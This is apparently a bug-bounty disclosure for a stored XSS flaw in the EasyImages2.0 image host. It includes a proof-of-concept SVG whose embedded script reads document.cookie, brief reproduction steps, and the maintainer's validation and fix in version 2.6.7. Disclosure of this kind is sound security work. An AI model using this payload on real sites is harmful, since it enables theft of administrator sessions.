Storage xss vulnerability exists in simple graph beds in icret/easyimages2.0

Valid

Reported on

Mar 2nd 2023


Description

Storage xss vulnerability exists in simple graph beds,By constructing a malicious svg code that directs the administrator to click, the cookie is stolen

Proof of Concept

Make the svg file as follows

<? xml version="1.0" standalone="no"? >
<! DOCTYPE SVG PUBLIC "- / / / / W3C DTD SVG 1.1 / / EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >

< SVG version = "1.1" baseProfile = "full" XMLNS = "http://www.w3.org/2000/svg" >
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

You can steal administrator cookies,No login required to upload svg files on the home page,Then the proof talks about administrator cookies,Set up a local environment and log in as an administrator 2 Upload the svg xss payload we constructed to the graph bed system 3 If yes, xss cookie theft will be triggered 4 Successfully get cookie 5

Impact

Steal or tamper with application cookies for session hijacking

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. a year ago
We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back a year ago
NCNIPC梅苑 modified the report
a year ago
icret validated this vulnerability a year ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

xulei1112 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
NCNIPC梅苑
a year ago

Researcher


This bug has been fixed in the new version https://github.com/icret/EasyImages2.0/commit/3434282bbb342966d9dfe256108f9f1d0eb97d34 can I apply a CVE number

NCNIPC梅苑
a year ago

Researcher


@admin

icret marked this as fixed in 2.6.7 with commit 95a6ca a year ago
icret has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation